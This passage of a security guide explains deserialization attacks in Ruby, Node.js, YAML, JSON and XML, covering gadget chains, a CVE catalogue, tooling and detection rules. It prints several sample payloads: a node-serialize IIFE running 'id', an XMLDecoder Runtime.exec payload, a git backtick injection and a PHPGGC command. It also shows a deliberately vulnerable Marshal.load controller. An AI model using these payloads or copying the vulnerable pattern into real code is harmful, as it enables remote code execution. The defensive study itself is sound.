Ruby’s Marshal module is the language’s native binary serialization format. Passing any untrusted bytes to Marshal.load should be treated as arbitrary code execution. The vulnerability was first publicly discussed in a 2013 Ruby bug tracker issue by Charlie Somerville (now Hailey) and has resisted fixes ever since.

class UserRestoreController < ApplicationController
  def show
    user_data = params[:data]
    deserialized = Marshal.load(Base64.decode64(user_data))
    render plain: "Restored: #{deserialized.inspect}"
  end
end

Gadget chain timeline

| Year | Gadget / Technique | Target |
|---|---|---|
| 2013 | Initial Marshal warning issue | Ruby 2.0 |
| 2016 | Phrack #69: Rails 3/4 Marshal exploit | Rails ≤ 4.0 |
| 2018 | Luke Jahnke: “Ruby 2.x Universal RCE Deserialization Gadget Chain” (elttam) | Ruby 2.x |
| 2019 | CVE-2019-5420 (Rails 5.2 Marshal) | Rails 5.2 |
| 2019 | Etienne Stalmans: YAML.load universal RCE | Ruby 2.x + Psych |
| 2021 | William Bowling: “Universal Deserialisation Gadget for Ruby 2.x–3.x” | Ruby 2.x/3.x |
| 2022 | William Bowling: “Round Two” updated gadget | Ruby 3.0/3.1 |
| 2024 | Alex Leahu (Include Security): Rails library-based chains | Rails |
| 2024 | GitHub Security Lab: JSON/XML/YAML/Marshal CodeQL queries + PoCs | Multi-format |
| 2024 | Luke Jahnke: Ruby 3.4 universal RCE + Gem::SafeMarshal escape | Ruby 3.4-rc1 |

The pattern: each patch closes one reachable entry point (Ruby’s equivalent of a Java readObject trigger), the gadget backend survives, researchers find another entry, repeat. Ruby 3.1 made YAML’s safe_load the default (via Psych 4). Ruby 3.2 patched Marshal gadgets. Ruby 3.4 was released with yet another chain barely averted.

The Gem::SpecFetcher → Runtime chain (2024)

The current canonical Ruby Marshal universal chain routes through Gem::SpecFetcher, Gem::Version, Gem::RequestSet::Lockfile, Gem::RequestSet, Gem::Resolver::SpecSpecification, Gem::Source::Git, and Gem::Resolver::GitSpecification. The chain ends in shell metacharacter expansion via a git invocation with an attacker-controlled repository name containing backticks:

any.zip → reference field contains `$(id > /tmp/pwn)` → git clone executes it

The gadget lives in RubyGems itself — core Ruby — so the only way to patch it is to change RubyGems internals. Doyensec and Trail of Bits have both found successive variants during RubyGems.org audits.

Where Marshal lurks in real apps

  • Rails cache store with :marshal (the default prior to Rails 7.1)
  • Rails session store in legacy configurations
  • Background job backends — Resque, Sidekiq (with Marshal coder), DelayedJob
  • Cookie-based flash messages in older Rails versions
  • DRb (distributed Ruby) — entire mechanism is Marshal over sockets
  • File-based Ruby object storage: .rb.cache, .marshal, .bin

YAML.load and Psych

Psych 4 (Ruby 3.1+) made YAML.load == YAML.safe_load by default. YAML.unsafe_load exists for compatibility. Pre-3.1 code calling YAML.load(user_data) is directly exploitable via !ruby/object: tags that instantiate arbitrary classes:

--- !ruby/object:Gem::Installer
  i: x

Stalmans’s 2019 chain produces ~3 KB of YAML reaching Runtime.exec-equivalent via ERB template evaluation in a Gem::Installer-chained setter.

JSON.parse(create_additions: true)

Ruby’s JSON.parse supports an opt-in mode where {"json_class": "SomeClass", ...} triggers SomeClass.json_create({...}). If any class on the load path defines a vulnerable json_create, this is an RCE path. Oj’s “default mode” enables similar behavior by default.


8. Node.js Deserialization

The node-serialize footgun

The npm package node-serialize serializes objects including functions — by wrapping functions as "_$$ND_FUNC$$_function () { ... }" strings and evaling them on deserialize. Passing untrusted input to serialize.unserialize() is direct RCE via IIFE:

const serialize = require('node-serialize');
const payload = {
  rce: "_$$ND_FUNC$$_function(){require('child_process').exec('id',function(e,s){console.log(s)});}()"
};
serialize.unserialize(JSON.stringify(payload));

The trailing () in the function string causes immediate invocation. CVE-2017-5941 covered the original disclosure; the package remains on npm with warnings.
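
Because the function marker is a fixed string, inbound JSON can be screened for it before it reaches any deserializer. The sketch below is a detection heuristic with hypothetical function names. It complements removing node-serialize from the request path and does not replace doing so.

```python
import json

FUNC_MARKER = "_$$ND_FUNC$$_"


def contains_function_marker(value) -> bool:
    """Recursively search decoded JSON for strings carrying the function marker."""
    if isinstance(value, str):
        return FUNC_MARKER in value
    if isinstance(value, dict):
        return any(contains_function_marker(k) or contains_function_marker(v)
                   for k, v in value.items())
    if isinstance(value, list):
        return any(contains_function_marker(v) for v in value)
    return False


def is_suspicious(body: str) -> bool:
    """True if the body parses as JSON and any string in it contains the marker."""
    try:
        return contains_function_marker(json.loads(body))
    except json.JSONDecodeError:
        return False
```

A body such as {"rce": "_$$ND_FUNC$$_function(){...}()"} is flagged, while ordinary JSON passes through unchanged.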

funcster, serialize-javascript

Similar patterns; serialize-javascript is relatively safer when used to produce output for client consumption but dangerous if the output is deserialized via eval on the server with attacker control.

Prototype pollution adjacency

Node.js deserialization bugs frequently co-occur with prototype pollution (__proto__ key injection via Object.assign, lodash.merge, JSON.parse + merge). A polluted prototype can modify the behavior of deserialization functions used downstream.

YAML in Node.js

js-yaml’s load() was unsafe in versions prior to 4.0, where safeLoad() was the safe variant. The yaml package is safe by default. Custom schemas and CORE_SCHEMA with type handlers can reintroduce unsafe behavior.

Main sinks to grep for

serialize.unserialize(...)
funcster.deepDeserialize(...)
eval(req.body.something)
new Function(req.body.something)
vm.runInNewContext(untrusted)
js-yaml load() (pre-4.0)
node-phantom, PhantomJS IPC

9. YAML & JSON Format Attacks

YAML is not “just data”

Modern YAML parsers support typed tags (!!, !, !<...>) that trigger class instantiation in the host language:

| Language | Unsafe Loader | Tag Syntax |
|---|---|---|
| Python (PyYAML <5.1) | yaml.load | !!python/object/apply:os.system ["id"] |
| Java (SnakeYAML <2.0) | Yaml().load | !!javax.script.ScriptEngineManager [...] |
| Ruby (Psych <4.0) | YAML.load | !ruby/object:Gem::Installer |
| .NET (YamlDotNet) | Untyped deserializer | !System.Diagnostics.Process |
| Go (yaml.v2 custom unmarshalers) | Type-dispatched | Typically safe unless reflective |

The maintainer response pattern is often to document the danger rather than change defaults, which is why CVEs in YAML libraries keep landing.

CVE-2022-1471 (SnakeYAML)

After at least eight prior related CVEs, SnakeYAML was finally given an umbrella CVE for “insecure by default.” SnakeYAML <2.0’s Yaml().load() accepts !! tags that instantiate arbitrary Java classes. A reachable YAML parser in any Spring/Jackson/REST ingestion path becomes RCE without authentication. Fixed in 2.0 by making SafeConstructor the default.

CVE-2026-24009 (Docling RCE via PyYAML)

A shadow vulnerability: Docling indirectly loaded PyYAML in a path that used yaml.load without an explicit safe loader, regressing when a dependency pin lapsed. The attack surface was document ingestion — upload a crafted document containing a YAML manifest with !!python/object/apply, and Docling parsed it on the server.

JSON deserialization dangers

Plain JSON isn’t directly vulnerable — JSON grammar has no type tags. But:

  • Polymorphic deserializers (Jackson enableDefaultTyping, Json.NET TypeNameHandling, fastjson autoType) add a @class/$type/@type field that reintroduces type-driven instantiation.
  • jsonpickle (Python) stores Python objects in JSON and round-trips them through pickle semantics on load.
  • Oj (Ruby) in :object mode preserves Ruby class info.
  • JSON.parse in Ruby with create_additions: true dispatches to json_create.

Fastjson (Java) is a notable case: com.alibaba.fastjson.JSON.parseObject(str, Object.class) with autoType enabled has had a continuous stream of RCE chains since 2017 (JdbcRowSetImpl JNDI chain being the canonical one).
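
Since every one of these mechanisms relies on a reserved key name, request bodies can be screened for them. The sketch below walks decoded JSON and reports each type hint with its location. The key set is assembled from the names mentioned in this guide plus jsonpickle's py/object key, and the sample document is made up for illustration.

```python
import json

TYPE_HINT_KEYS = {"@class", "@type", "$type", "json_class", "py/object", "__type"}


def type_hints(value, path="$"):
    """Yield (path, key, hinted_type) for every polymorphic type hint found."""
    if isinstance(value, dict):
        for key, child in value.items():
            if key in TYPE_HINT_KEYS:
                yield (path, key, child)
            yield from type_hints(child, f"{path}.{key}")
    elif isinstance(value, list):
        for i, child in enumerate(value):
            yield from type_hints(child, f"{path}[{i}]")


doc = json.loads(
    '{"user": {"@type": "com.sun.rowset.JdbcRowSetImpl", "name": "x"},'
    ' "items": [{"$type": "System.Diagnostics.Process, System"}]}'
)
hits = list(type_hints(doc))
```

A hit is not proof of exploitation, since some APIs legitimately use these keys, but on an endpoint that expects plain data it is a strong signal worth logging or rejecting.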

XML deserialization

XMLDecoder (Java) and XML-based formatters in .NET (SoapFormatter, XamlReader.Parse) are equivalent in power to their binary cousins. java.beans.XMLDecoder.readObject parses XML that directly specifies method invocations:

<java>
  <object class="java.lang.Runtime" method="getRuntime">
    <void method="exec">
      <string>calc</string>
    </void>
  </object>
</java>

XStream’s default configuration before 1.4.18 allowed similar arbitrary-class instantiation; dozens of CVEs (CVE-2021-21344 through CVE-2021-39154 and onward) document the gadget chain parade.


10. Gadget Chains Explained

The chain-of-method-dispatch abstraction

A gadget chain is a sequence of class method invocations connected by field references, where:

  1. Entry gadget — a class whose readObject, __wakeup, __destruct, __reduce__, etc. is called automatically during deserialization and does something more than set fields.
  2. Relay gadgets — classes whose methods (called by the previous gadget) make further method calls on attacker-controlled fields, propagating control flow.
  3. Sink gadget — terminal class whose invoked method reaches a native “do something dangerous” primitive (exec, eval, system, file write, reflection invoke, HTTP request, deserialize-again).

The attacker picks an object type for each field so that the “dynamic dispatch” at each link points to the next gadget. The chain is then serialized and submitted to the sink.

Why chains exist (the Russian doll metaphor)

No sane developer writes readObject to call Runtime.exec directly. But developers write readObject methods that call this.field.someMethod(), where someMethod is an interface method. The JVM / PHP / Python runtime resolves someMethod at dispatch time based on the actual class of this.field. Swap this.field for a LazyMap or an InvokerTransformer and you’ve changed the target of the call without changing the call site.
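A toy model makes the entry / relay / sink structure concrete. The sketch below deliberately avoids any real serialization format: `toy_deserialize`, the `on_load` hook, and the three classes are hypothetical, and the "sink" only appends to a list. The point is that no class calls anything dangerous by name; the payload alone decides what each field's type is.

```python
SINK_LOG = []  # records what the harmless "sink" was asked to run


class CacheEntry:
    """Entry gadget: its load hook calls a method on a field."""
    def on_load(self):
        self.loader.refresh()


class LazyProxy:
    """Relay gadget: forwards the call to another attacker-typed field."""
    def refresh(self):
        self.target.run(self.arg)


class CommandRunner:
    """Sink gadget stand-in: a real one would reach exec/system."""
    def run(self, arg):
        SINK_LOG.append(arg)


CLASSES = {c.__name__: c for c in (CacheEntry, LazyProxy, CommandRunner)}


def toy_deserialize(node):
    # The payload names the class; fields are set without running __init__.
    if not (isinstance(node, dict) and "class" in node):
        return node
    cls = CLASSES[node["class"]]
    obj = cls.__new__(cls)
    for key, value in node.get("fields", {}).items():
        setattr(obj, key, toy_deserialize(value))
    hook = getattr(obj, "on_load", None)
    if hook is not None:
        hook()  # analogous to readObject / __wakeup firing automatically
    return obj


payload = {
    "class": "CacheEntry",
    "fields": {"loader": {"class": "LazyProxy", "fields": {
        "target": {"class": "CommandRunner"}, "arg": "id"}}},
}
toy_deserialize(payload)
```

After the call, `SINK_LOG` holds the attacker-chosen argument, even though `CacheEntry.on_load` only ever calls `refresh()` on whatever object it was given.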

Gadget hunting methodology

  1. Seed set: find all classes implementing the deserializable marker (java.io.Serializable, PHP __wakeup/__destruct, Python __reduce__, .NET [Serializable]).
  2. Entry set: filter to classes whose deserialization-time methods do more than field assignment — call any method on a field, any reflection API, any eval-equivalent.
  3. Graph expansion: for each entry, model “what methods does this call on fields I control?” Traverse the call graph backward from known sinks (Runtime.exec, eval, system, include).
  4. Constraint solving: each edge has type requirements (the field must be assignable to an interface that has the called method); solve for a feasible object graph.
  5. Serializability filter: every node in the graph must itself be deserializable by the target format.
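The graph-expansion step can be sketched as a path search. The example below is a simplified, hand-written model and not the output of any tool: the `CALL_GRAPH` edges loosely follow the shape of the CommonsCollections and URLDNS chains, and it searches forward from entry points rather than backward from sinks, which is an assumption made to keep the code short. Type constraints and the serializability filter are reduced to a single `blocked` set.

```python
from collections import deque

# Hypothetical call graph: method -> methods it may invoke on attacker-typed fields.
CALL_GRAPH = {
    "PriorityQueue.readObject": ["Comparator.compare"],
    "Comparator.compare": ["TransformingComparator.compare"],
    "TransformingComparator.compare": ["Transformer.transform"],
    "Transformer.transform": ["InvokerTransformer.transform",
                              "ConstantTransformer.transform"],
    "InvokerTransformer.transform": ["Method.invoke"],
    "ConstantTransformer.transform": [],
    "HashMap.readObject": ["Object.hashCode"],
    "Object.hashCode": ["URL.hashCode"],
    "URL.hashCode": ["InetAddress.getByName"],
}
ENTRIES = ["PriorityQueue.readObject", "HashMap.readObject"]
SINKS = {"Method.invoke", "InetAddress.getByName"}


def find_chains(graph, entries, sinks, blocked=frozenset()):
    """Breadth-first search for entry -> sink paths, skipping blocked nodes."""
    chains = []
    for entry in entries:
        queue = deque([[entry]])
        while queue:
            path = queue.popleft()
            node = path[-1]
            if node in sinks:
                chains.append(path)
                continue
            for nxt in graph.get(node, []):
                if nxt not in path and nxt not in blocked:
                    queue.append(path + [nxt])
    return chains


for chain in find_chains(CALL_GRAPH, ENTRIES, SINKS):
    print(" -> ".join(chain))
```

Passing `blocked={"InvokerTransformer.transform"}` removes the first chain but leaves the `HashMap.readObject` path intact, which is the single-class-patch limitation in miniature.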

Automated gadget discovery tools

| Tool | Language | Approach |
| --- | --- | --- |
| Gadget Inspector | Java | Bytecode analysis; finds call-graph paths from readObject to sinks |
| JOOGIE | Java | Static data-flow analysis |
| SerHyBrid | Java | Hybrid static/dynamic exploration |
| PHPGGC | PHP | Curated chain database with generator CLI |
| Fickling | Python | Pickle bytecode parser, static analyzer, and gadget constructor |
| PickleBall | Python | Per-library policy generator, not discovery |
| Freddy (Burp) | Multi | Deserialization payload injector with ~30 known chains |
| ysoserial / ysoserial.net | Java / .NET | Payload generator for ~30 known Java chains, ~15 .NET |
| marshalsec | Java | Non-JDK serialization formats (Jackson, XStream, Kryo, Hessian, JYaml, Red5) |
| GadgetProbe | Java | DNS-based blind probing to fingerprint classpath classes |

The “unpatchable” property

A gadget chain is a path through the classpath. Patching one class on the path closes that specific path but leaves every other path open. The set of gadgets on a modern enterprise Java classpath is combinatorially enormous — any library that does reflection, method dispatch on attacker-controlled fields, or custom deserialization logic is a potential source of gadgets. This is why the only durable fix is to not deserialize untrusted data in native formats.


11. Real-World CVEs & Exploitation Chains

Java

| CVE | Product | Chain / Trigger |
| --- | --- | --- |
| CVE-2015-4852 | WebLogic | CommonsCollections over the T3 protocol |
| CVE-2015-7501 | JBoss/Jenkins | CommonsCollections via /invoker/JMXInvokerServlet |
| CVE-2016-1000031 | Apache Commons FileUpload | DiskFileItem reflective file write |
| CVE-2017-5638 | Struts2 (S2-045) | OGNL via Content-Type (not pure deser, related family) |
| CVE-2017-10271 | WebLogic | XMLDecoder on WLS-wsat /wls-wsat/CoordinatorPortType |
| CVE-2018-7489 | Jackson-databind | c3p0 gadget via default typing |
| CVE-2019-2725 | WebLogic | XMLDecoder unauthenticated RCE |
| CVE-2019-17571 | Log4j 1.x SocketServer | ObjectInputStream on log socket |
| CVE-2021-44228 | Log4j 2 (Log4Shell) | JNDI lookup (adjacent but not pure deser) |
| CVE-2022-1471 | SnakeYAML | !!ScriptEngineManager with URLClassLoader |
| CVE-2022-22963 | Spring Cloud Function | SpEL via spring.cloud.function.routing-expression |
| CVE-2022-22965 | Spring Framework (Spring4Shell) | class.module.classLoader binding exposure |
| CVE-2022-33980 | Apache Commons Configuration | Script interpolator |
| CVE-2023-22518 | Confluence | Improper authorization on setup/restore actions (adjacent, not pure deser) |
| CVE-2024-36991 | Splunk | Path traversal → file-based deser |
| CVE-2026-33728 | dd-trace-java RMI instrumentation | Unsafe deserialization in RMI instrumentation may lead to RCE |
| CVE-2026-33439 | OpenAM | Pre-auth RCE via Java deserialization |

PHP

| CVE | Product | Chain |
| --- | --- | --- |
| CVE-2015-8562 | Joomla | User-Agent injection → session deser → POP chain |
| CVE-2016-9920 | phpMyAdmin | __destruct file write |
| CVE-2017-12794 | Symfony | Property injection via session cookie |
| CVE-2018-17057 | Yii 2 | __destruct via BatchAction |
| CVE-2019-6340 | Drupal 8 | REST _type POP chain |
| CVE-2019-11043 | PHP-FPM | Adjacent (not pure deser) |
| CVE-2020-28949 | Archive_Tar | Phar deser via tar extract |
| CVE-2021-41773 | Apache HTTP Server | Path traversal (adjacent) |
| CVE-2023-1671 | Sophos Web Appliance | PHP deser RCE |
| CVE-2024-4577 | PHP CGI | Adjacent argument injection |
| CVE-2026-3422 | U-Office Force | Critical RCE via insecure deserialization |

Python

| CVE | Product | Pattern |
| --- | --- | --- |
| CVE-2017-7610 | Ansible Tower | YAML deser |
| CVE-2019-20477 | PyYAML | FullLoader bypass |
| CVE-2020-14343 | PyYAML | Bypass of earlier fix |
| CVE-2022-0330 | graphql-python | pickle session |
| CVE-2023-27586 | torch.load | Pre-weights_only default |
| CVE-2025-32444 | vLLM Mooncake | ZeroMQ recv_pyobj() on 0.0.0.0 (CVSS 10.0) |
| CVE-2025-24357 | vLLM | Torch checkpoint untrusted load |
| CVE-2026-24009 | Docling | PyYAML regression via unpinned dep |
| CVE-2026-25769 | Wazuh | Critical RCE via unsafe deserialization |
| CVE-2026-26220 | LightLLM | WebSocket pickle with broken nonce auth |
| CVE (picklescan) | picklescan | 4 separate bypass CVEs in 2025 (Sonatype) |
| CVE (picklescan) | picklescan | 3 zero-days disclosed by JFrog |
| IBM Langflow Desktop | Langflow | RCE via insecure deserialization |

.NET

| CVE | Product | Pattern |
| --- | --- | --- |
| CVE-2017-9424 | SharePoint | XmlSerializer with untyped payload |
| CVE-2019-0604 | SharePoint | XmlSerializer via ItemMetadata |
| CVE-2020-0688 | Exchange | ViewState forgery with static machine key |
| CVE-2020-0932 | SharePoint | BinaryFormatter |
| CVE-2020-25258 | Hyland OnBase | BinaryFormatter |
| CVE-2021-27076 | SharePoint | Replay-style ObjectStateFormatter |
| CVE-2021-29508 | Wire (Proto.Actor) | BinaryFormatter-backed IPC |
| CVE-2022-21969 | Exchange | BinaryFormatter in MAPI |
| CVE-2023-3513 | Razer Central | BinaryFormatter named pipe |
| CVE-2023-5914 | CentralSquare | BinaryFormatter |
| CVE-2024-29847 | Ivanti EPM | Agent Portal deserialization |
| CVE-2024-38094 | SharePoint | XML deserialization |
| CVE-2025-53770 | SharePoint ToolShell | ViewState deser chain, actively exploited |
| CVE-2026-20963 | SharePoint | Deserialization RCE |
| CVE-2026-26114 | SharePoint | Deserialization RCE |
| SolarWinds WHD | Web Help Desk | Java deserialization enabling command execution |

Ruby

| CVE | Product | Pattern |
| --- | --- | --- |
| CVE-2013-0156 | Rails | YAML in XML params |
| CVE-2019-5420 | Rails 5.2 | Marshal in dev mode secret key |
| CVE-2020-8163 | Rails | Local variables in partials |
| CVE-2022-32224 | Rails (Active Record) | YAML.unsafe_load on serialized columns |
| RubyGems.org | | Multiple informational-severity Marshal issues (ToB audit) |

Notable exploitation chains

SharePoint ToolShell (CVE-2025-53770, July 2025). Unauthenticated attackers POST a crafted request to /_layouts/15/ToolPane.aspx with a __VIEWSTATE carrying a deserialization payload (TextFormattingRunProperties → XAML → Process.Start). The webshell then parses additional VIEWSTATE-encoded commands. Check Point Research observed 4,600+ compromise attempts across 300+ organizations in one week; the same IPs chained Ivanti EPMM CVE-2025-4427/4428 for lateral movement. Mitigation required rotating ASP.NET machine keys in addition to patching.

WebLogic Christmas (CVE-2015-4852 → CVE-2017-10271 → CVE-2019-2725 → …). A continuous stream of deserialization RCEs against Oracle WebLogic over a 5+ year window. Each patch closed one reachable deserializer endpoint; the next CVE found another (T3 → IIOP → XMLDecoder in wls-wsat → async SOAP → …). Illustrates the “cannot patch your way out” property at enterprise scale.

Jenkins Jenkinspocalypse (CVE-2015-8103, CVE-2016-0792, CVE-2016-9299). Unauthenticated Jenkins instances exposed a CLI port that accepted serialized Java objects. CommonsCollections gadget was directly applicable. Thousands of public Jenkins instances fell in the ensuing mass-exploitation wave.

Equifax (CVE-2017-5638, Struts2). Not pure deserialization — OGNL injection via Content-Type — but illustrates the same root cause: attacker-controlled data reaches a VM that interprets it as code. Directly led to the exposure of 147 million records.

Log4Shell adjacency (CVE-2021-44228). JNDI lookups embedded in log strings fetch remote Reference objects; upon resolution, the javaSerializedData field is deserialized via the classic JDK path, re-entering the deserialization attack family through a logging front door.


12. Tools & Automation

Offensive tooling (used defensively for payload generation, detection, and validation)

| Tool | Language | Purpose |
| --- | --- | --- |
| ysoserial | Java | Canonical Java deserialization payload generator (~30 chains) |
| ysoserial.net | .NET | Equivalent for .NET with ~15 gadget families including XAML chains |
| marshalsec | Java | Non-JDK formats: Jackson, XStream, Kryo, Hessian, JYaml, Red5, JSON-IO |
| PHPGGC | PHP | Curated PHP POP chain database and payload generator |
| Fickling | Python | Pickle decompiler, static analyzer, payload constructor |
| ModelScan | Python | ML model file scanner (Protect AI) |
| picklescan | Python | Blocklist scanner used by Hugging Face (known bypasses exist) |
| GadgetProbe | Java | DNS-based blind classpath fingerprinting |
| Freddy | Burp plugin | Injects deserialization payloads across formats |
| SerialKiller | Java | Runtime allowlist enforcement (wraps ObjectInputStream) |
| NotSoSerial | Java | Runtime blocklist enforcement |
| ConstructionInspector | Java | Build-time gadget detection via classpath analysis |
| Semgrep rules | Multi | Trail of Bits published rules for Ruby (marshal-load-method, rails-cache-store-marshal, yaml-unsafe-load, json-create-deserialization) |
| CodeQL queries | Multi | GitHub Security Lab publishes unsafe-deserialization queries for Java, Ruby, Python, C# |

ysoserial usage (defensive validation)

Security teams use ysoserial to validate that patches, allowlists, and WAF rules actually block known payloads. The tool takes a chain name and a command and emits serialized bytes suitable for piping into a test harness that stands in for your application’s deserialization sink. Each chain only works when its prerequisite libraries are on the target classpath, so pick chains that match the dependencies you actually ship.

marshalsec

Moritz Bechler’s marshalsec covers the non-JDK format space (Jackson, XStream, Kryo, Hessian, JYaml, etc.). It is the reference for understanding that “Java deserialization” is not just ObjectInputStream — every polymorphic serializer in the ecosystem has the same category of bug.

PHPGGC

./phpggc Monolog/RCE1 system id produces a serialized payload for the Monolog RCE1 chain. Chains are namespaced by target library: Laravel/RCE1..n, Drupal/RCE1..n, Symfony/RCE1..n, WordPress/RCE1..n, PrestaShop/RCE1..n, Yii/RCE1..n, and many more. Use -l <keyword> to list chains, -u to URL-encode, -b to base64-encode, and -p (--phar) to produce a PHAR file (for the phar:// trick).

Fickling

Trail of Bits’s Fickling disassembles pickle bytecode (a static analysis step no generic analyzer performs by default). It can detect known-malicious patterns, decompile pickle opcodes to pseudo-Python, and construct payloads to test defenses. Critically, it demonstrates how trivially pickle exploitation generalizes — any callable reachable from Python’s import system is a gadget.
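The core idea of inspecting pickle bytecode without executing it can be approximated with the standard library’s `pickletools` module. This is a minimal sketch and not Fickling’s implementation: the `SUSPICIOUS` opcode set and the `scan_pickle` helper are assumptions made for illustration, and a real analyzer also reconstructs which callable each `REDUCE` applies.

```python
import pickletools

# Opcodes that import names or invoke callables during unpickling.
SUSPICIOUS = {
    "GLOBAL", "STACK_GLOBAL", "INST", "OBJ",
    "NEWOBJ", "NEWOBJ_EX", "REDUCE", "BUILD",
}


def scan_pickle(data: bytes):
    """Return (offset, opcode name, argument) for each suspicious opcode.

    pickletools.genops only parses the stream; nothing is unpickled.
    """
    findings = []
    for opcode, arg, pos in pickletools.genops(data):
        if opcode.name in SUSPICIOUS:
            findings.append((pos, opcode.name, arg))
    return findings


# Classic protocol-0 payload that would call os.system("id") if loaded.
evil = b"cos\nsystem\n(S'id'\ntR."
for pos, name, arg in scan_pickle(evil):
    print(pos, name, arg)
```

A pickle of plain containers and numbers produces no findings, while the payload above surfaces a `GLOBAL` for `os system` followed by a `REDUCE`. Flagging opcodes this way is coarse: many legitimate pickles of custom classes also use them, so treat hits as "needs an allowlist decision" rather than "malicious".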

Build-time detection

  • Dependency scanning: identify commons-collections, commons-beanutils, spring-core, jackson-databind, xstream, groovy, hibernate, c3p0, rome, snakeyaml versions against known-vulnerable ranges.
  • Classpath hygiene: remove unused libraries. A gadget in an unused library is still a gadget.
  • SBOM generation: CycloneDX/SPDX inventories plus vulnerability databases (OSS Index, GHSA) will catch most known-bad versions.

Runtime detection

  • Java: ObjectInputFilter (JEP 290; JDK 9+, backported to 8u121, 7u131, and 6u141) allows allowlisting or blocklisting classes during readObject. Because the filter can be set process-wide, it also covers legacy code that cannot be rewritten.
  • .NET: BinaryFormatter’s Binder property accepts a SerializationBinder that restricts types; however, Microsoft’s own guidance states this is insufficient and that BinaryFormatter should be retired entirely.
  • Ruby: Marshal.load has no type filter. Wrap in a custom class-checking loader or migrate.
  • Python: subclassing pickle.Unpickler and overriding find_class to allowlist is the documented approach. It works but is fragile — see picklescan bypass research.

13. Detection & Static Analysis

Taint source → sink patterns

| Language | Source | Sink |
| --- | --- | --- |
| Java | HttpServletRequest.getInputStream() | new ObjectInputStream(...).readObject() |
| Java | request.getParameter(...) | Base64.decode → readObject, XMLDecoder.readObject |
| PHP | $_GET, $_POST, $_COOKIE, file_get_contents("php://input") | unserialize, yaml_parse |
| PHP | Any user-controlled path | file_exists("phar://$path"), filesize, is_dir |
| Python | request.data, websocket.receive_bytes, socket.recv | pickle.loads, joblib.load, torch.load |
| Python | File path from DB / config / upload | yaml.load, yaml.unsafe_load |
| .NET | Request.Form, Request.InputStream, Request["__VIEWSTATE"] | BinaryFormatter.Deserialize, ObjectStateFormatter.Deserialize |
| .NET | JsonConvert.DeserializeObject with TypeNameHandling != None | The call itself |
| Ruby | params[:data], cookies[:session] | Marshal.load, YAML.load (unsafe), Oj.load default |
| Node.js | req.body, req.query | serialize.unserialize, eval, vm.runInNewContext |

CodeQL query shape

GitHub Security Lab’s unsafe deserialization queries model:

  1. A set of known-dangerous deserialization calls as sinks.
  2. A standard HTTP-input taint source set.
  3. An intermediate “encoding” sanitizer set that does not actually sanitize but is often wrongly assumed to (Base64, URL-decode, JSON.parse).
  4. Path constraints requiring the sink to be reachable from the source without passing through type-safe deserializers.

Semgrep / grep signatures

# Java
pattern: new ObjectInputStream($X).readObject()
pattern: new XMLDecoder(...).readObject()
pattern: new Yaml().load($X)        # SnakeYAML
pattern: $MAPPER.enableDefaultTyping()
pattern: new XStream().fromXML($X)   # without setupDefaultSecurity
pattern: $KRYO.readClassAndObject(...)

# PHP
pattern: unserialize($_...)
pattern: unserialize($$X) where $$X from $_GET/$_POST/$_COOKIE
pattern: yaml_parse($X)
pattern: file operation on user-controlled "phar://..."

# Python
pattern: pickle.loads(...)
pattern: pickle.load(...)
pattern: joblib.load(...)
pattern: torch.load(...)            # without weights_only=True
pattern: numpy.load(..., allow_pickle=True)
pattern: yaml.load($X)              # without SafeLoader
pattern: yaml.unsafe_load(...)
pattern: recv_pyobj()

# .NET
pattern: new BinaryFormatter().Deserialize(...)
pattern: new SoapFormatter().Deserialize(...)
pattern: new NetDataContractSerializer().ReadObject(...)
pattern: new ObjectStateFormatter().Deserialize(...)
pattern: new LosFormatter().Deserialize(...)
pattern: JsonConvert.DeserializeObject<$T>(..., settings with TypeNameHandling.All|Objects|Arrays|Auto)
pattern: new JavaScriptSerializer(new SimpleTypeResolver())

# Ruby
pattern: Marshal.load(...)
pattern: YAML.load(...)             # if pre-Psych 4
pattern: YAML.unsafe_load(...)
pattern: Oj.load(...)               # default mode
pattern: JSON.parse(..., create_additions: true)
pattern: Rails.cache with :marshal coder

# Node.js
pattern: serialize.unserialize(...)
pattern: eval(<user data>)
pattern: new Function(<user data>)
pattern: vm.runInNewContext(<user data>)
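
For Python code, the signatures listed above can be approximated without Semgrep by walking the AST. The sketch below is a purely syntactic check under stated assumptions: `scan_source`, `DANGEROUS_CALLS`, and `SAFE_YAML_LOADERS` are names invented here, it only matches calls written as `module.function(...)`, and it does no taint tracking, so aliased imports and indirect calls are missed.

```python
import ast

DANGEROUS_CALLS = {
    ("pickle", "load"), ("pickle", "loads"), ("joblib", "load"),
    ("torch", "load"), ("yaml", "load"), ("yaml", "unsafe_load"),
}
SAFE_YAML_LOADERS = {"SafeLoader", "CSafeLoader"}


def _is_true(node):
    return isinstance(node, ast.Constant) and node.value is True


def _is_safe_loader(node):
    # Accepts both yaml.SafeLoader (Attribute) and a bare SafeLoader (Name).
    name = getattr(node, "attr", None) or getattr(node, "id", None)
    return name in SAFE_YAML_LOADERS


def scan_source(source):
    """Return sorted (line, call) pairs for risky deserialization calls."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if not (isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name)):
            continue
        call = (func.value.id, func.attr)
        if call not in DANGEROUS_CALLS:
            continue
        keywords = {kw.arg: kw.value for kw in node.keywords}
        # torch.load(..., weights_only=True) is treated as acceptable.
        if call == ("torch", "load") and _is_true(keywords.get("weights_only")):
            continue
        # yaml.load with an explicit safe loader is treated as acceptable.
        if call == ("yaml", "load"):
            loader = keywords.get("Loader")
            if loader is None and len(node.args) > 1:
                loader = node.args[1]
            if loader is not None and _is_safe_loader(loader):
                continue
        findings.append((node.lineno, f"{call[0]}.{call[1]}"))
    return sorted(findings)
```

Running `scan_source` over a file’s text yields line numbers to review; it is a triage aid, and a dataflow-aware tool is still needed to decide whether untrusted bytes actually reach each call.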

Runtime telemetry signals

  • Java ClassNotFoundException bursts during deserialization — attacker probing which gadget classes exist.
  • Outbound DNS lookups correlated with request handlers — URLDNS probe pattern.
  • JRMP/LDAP outbound from app servers — JNDI gadget signal.
  • Process spawn by application JVM/CLR/PHP/Python workers — deserialization RCE footprint.
  • Unusual child processes under w3wp.exe — ViewState RCE.
  • Memory/CPU spikes with deep object graphs — DoS attempts.
  • readObject stack frames in production stack traces — inventory for review.

Log-based detection

Log deserialization exceptions. Many real exploits throw exceptions partway through the chain (e.g., cast failures after the side-effect-bearing gadget fires). A spike of ClassCastException, InvalidClassException, java.io.StreamCorruptedException, _pickle.UnpicklingError, TypeError: __reduce__ is a signal.
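
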